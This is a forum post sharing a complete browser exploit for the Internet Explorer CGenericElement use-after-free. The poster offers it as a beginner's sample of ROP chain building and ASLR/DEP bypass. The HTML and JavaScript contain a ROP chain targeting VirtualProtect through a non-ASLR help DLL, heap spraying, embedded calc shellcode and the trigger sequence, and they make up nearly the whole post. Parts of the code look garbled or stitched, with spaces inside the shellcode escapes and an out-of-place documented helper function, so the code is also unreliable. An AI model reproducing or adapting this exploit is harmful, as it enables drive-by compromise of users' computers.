



"vinnu"
06-29-2013, 01:23 PM
Namaste

The following is the CGenericElement exploit using the mshelp:// protocol, which applies when a Visual Studio version earlier than 2010 is installed;
it is a good sample for beginners in exploitation, especially ROP chain generation and ASLR+DEP bypass:




<!--
Exploit Title: "Developers Holocaust".
Developer : "vinnu"
Team : "Legion Of Xtremers"
ASLR+DEP bypass : "mshelp://" protocol can be used if Visual Studio below 2010 is installed.
It loads non ASLR module hxds.dll:
Base=51BC0000
Size=000D7000 (880640.)
Entry=51BDA1D4 hxds.<ModuleEntryPoint>
Name=hxds
File version=2.05.50727.42 (RTM.050727-4200)
Path=C:\Program Files (x86)\Common Files\Microsoft Shared\Help\hxds.dll
Special Thanx: Garage4Hackers, happy_t3rmin4t0r,l0rd_D34thst0rm,b0nd,fb1h2s...
-->
<!doctype html>
<head>
<script>
var virtable = "alfabetagammad\u1020\u0c10".substring(0x0e,0x20);//"alfabetagammad\u1020\u0c10".substring(0x0e,0x20);
function paint() {
var highlim = 300;//1600;
var bsize = 0x040000;var redzone = 0x20//0x48;
var halloween = "\uC876\u51BD"//"\u0102\u0103" // pop eax;ret
+"\u105a\u0c10"//"\u0104\u0105"// popped in eax
+"\u3838\u51C0"//"\u0106\u0107"// and word ptr ds:[eax],0;xor eax,eax,ret8;
+"\uC876\u51BD"//"\u0108\u0109"//pop eax,ret
+"\u010a\u010b"
+"\u110b\u110c"
+"\u105e\u0c10"//"\u010e\u010f"// popped in eax
+"\u3838\u51C0"//"\u0110\u0111"// and word ptr ds:[eax],0;xor eax,eax,ret8;
+"\uC876\u51BD"//"\u0112\u0113"// pop eax,ret
+"\u1114\u1115"
+"\u111c\u111d"
+"\u1158\u51BC"//"\u1158\u51BC"//"\u111e\u111f"// popped in eax : &VirtualProtect.
+"\uD6B0\u51BC"//"\u10a0\u0c10"//"\u1120\u1121" // call [eax];pop edi;pop esi;ret10
+"\u1094\u0c10"//"\u1122\u1123" // Address
+"\u4096\u1123"//"\u1122\u1123" // Size
+"\u0040\u1125"//"\u1124\u1125"// PAGE_READWRITE_EXECUTE
+"\u1020\u0c10"//"\u1126\u1127" // OldProtection
+"\u1128\u1129"
+"\u112a\u112b"
+"\u1094\u0c10"//"\u112c\u112d" // ASLR Bypassed, goto Shellcode.
+"\u112e\u112f"
+"\u1130\u1131"
+"\u1132\u1133"
+"\u1134\u1135"
+"\u1136\u1137"
+"\u1138\u1139"
+"\u113a\u113b"
+"\u113c\u113d"
+"\u27bf\u51bc"//"\u113e\u113f" // xchg eax,esp;ret
/* +"\u1140\u1141"
+"\u1142\u1143"
+"\u1144\u1145"
+"\u1146\u1147"
+"\u116b\u116c"
+"\u116d\u116e"
+"\u116f\u1170"
+"\u1171\u1172"
+"\u1173\u1174"
+"\u1175\u1176"
+"\u1177\u1178"
+"\u1179\u117a"
*/ //Shellcode
// Calc shellcode:
+"\u9191\u9191\u9191\u9191\uceba\u11fa\u291f\ub1c9\u db33\ud9ce\u2474\u5ef4\u5631\u030e\u0e56\u0883\uf3 fe\u68ea\u7a17\u9014\u1de8\u759c\u0fd9\ufefa\u8048 \u5288\u6b61\u46dc\u19f2\u69c9\u94b3\u442f\u1944\u 0af0\u3b86\u508c\u9bdb\u9bad\udd2e\uc1ea\u8fc1\u8e a3\u2070\ud2c7\u4148\u5907\u39f0\u9d22\uf385\ucd2d \u8f36\uf566\ud73d\u0456\u0b91\u4faa\uf89e\u4e58\u 3176\u61a0\u9eb6\u4e9f\ude3b\u68d8\u95a4\u8b12\uae 59\uf6e0\u3b85\u50f5\u9b4d\u61dd\u7a82\u6d95\u086f \u71f1\udd6e\u8d89\ue0fb\u045d\uc6bf\u4d79\u661b\u 2bdb\u97ca\u933b\u3db3\u3137\u44a7\u5f1a\uc436\u26 20\ud638\u082a\ue751\uc7a1\uf826\uac63\u1ac9\ud8a6 \u8361\u6123\u34ec\ua59e\ub709\u552b\ua7ee\u5059\u 6faa\u28b1\u05a3\u9fb5\u0fc4\u7ed6\ud357\ue537\u76 df\u4148";
/* +"\ucccc\ucccc\ucccc\ucccc\u4141\u4141"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";
*/
while(halloween.length < 0x200) {halloween += virtable;}
airbreeze = halloween.substring(0,0x100);
while (airbreeze.length<0x60000) {airbreeze += airbreeze}
var ropway = airbreeze.substring(0, 0x40000 - redzone);
var greenCodec = new Array();
for (var iter=0;iter<highlim;iter++){
greenCodec.push(document.createElement("div"));
}
for (var iter=0;iter<highlim;iter++){
greenCodec[iter].className = ropway;
}
}
function ignite() {
// var sobj = document.createElement("img");
// sobj.src="ms-help://MS.VSCC.v80/MS.Dexplore.v80.en/dv_dexplore/html/92b51076-8841-45a2-8e2b-9165146c5c23.htm";
// document.body.appendChild(sobj);
var alfa = new Array();
var nsize = 0x20;
for(var as=0;as<0x1000;as++) {
alfa.push(document.createElement("div"));
}
f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
document.body.appendChild(f1);
f2 = document.createElement('span');
document.body.appendChild(f2);
document.body.contentEditable="true";
f2.appendChild(document.createElement('datalist')) ;
f1.appendChild(document.createElement('span'));
f1.appendChild(document.createElement('table'));
try{
f0.offsetParent=null;
}catch(e) {}
f2.innerHTML="";
f0.appendChild(document.createElement('hr'));
f1.innerHTML="";
CollectGarbage();
a = document.getElementById('myanim');

for(var as = 0;as<100/*0x1000*/;as++) {
alfa[as].title = unescape("%u1020%u0c10"/*"%u4140%u4141*/+"%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u 414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u41 53%u4154%u4155%u4156%u4157%u4158%u4159%u415a%u415b").substr(0,nsize);
}
paint();

alert(1);
// window.location.reload();
//[0x5FFF031C]
a.values = alfa[4].title;
}
/**
 * Constant-true callback used as the `onerror` handler of the help-protocol
 * script tag in the body below.
 *
 * @returns {boolean} always `true`
 */
function returnTrue() {
  const alwaysTrue = true;
  return alwaysTrue;
}
</script>
</head>
<body onload="eval(ignite());">
<t:ANIMATECOLOR id="myanim"/>
<script src="ms-help://MS.VSCC.v80/MS.Dexplore.v80.en/dv_dexplore/html/92b51076-8841-45a2-8e2b-9165146c5c23.htm" onerror="returnTrue();" />
</body>
</html>
<!------Call Flow:
113f113e
01020103
01060107
01090108
01110110
01120113
011f011e
112d112c :->ASLR Bypassed.
-------->



